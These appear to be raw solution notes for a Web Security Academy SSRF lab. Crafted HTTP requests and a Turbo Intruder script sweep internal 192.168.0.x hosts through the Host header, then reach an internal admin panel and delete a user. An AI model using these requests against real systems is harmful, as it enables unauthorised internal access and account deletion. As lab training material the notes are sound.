GET / HTTP/1.1
Host: ac521fda1eb5887ac0de079e0067009c.web-security-academy.net

GET https://ac521fda1eb5887ac0de079e0067009c.web-security-academy.net/ HTTP/1.1
Host: ac521fda1eb5887ac0de079e0067009c.web-security-academy.net

GET https://ac521fda1eb5887ac0de079e0067009c.web-security-academy.net/ HTTP/1.1
Host: %s


def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           pipeline=False
                           )

    for i in range(255):
        engine.queue(target.req, "192.168.0." + str(i))


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    table.add(req)


GET https://ac521fda1eb5887ac0de079e0067009c.web-security-academy.net/ HTTP/1.1
Host: 192.168.0.95

GET https://ac521fda1eb5887ac0de079e0067009c.web-security-academy.net/admin HTTP/1.1
Host: 192.168.0.95

POST https://ac521fda1eb5887ac0de079e0067009c.web-security-academy.net/admin/delete HTTP/1.1
Host: 192.168.0.95

csrf=6EIR7UeGTB1R99lZMQv77RYpR5cml8pf&username=carlos

GET https://ac521fda1eb5887ac0de079e0067009c.web-security-academy.net/admin HTTP/1.1
Host: 192.168.0.95
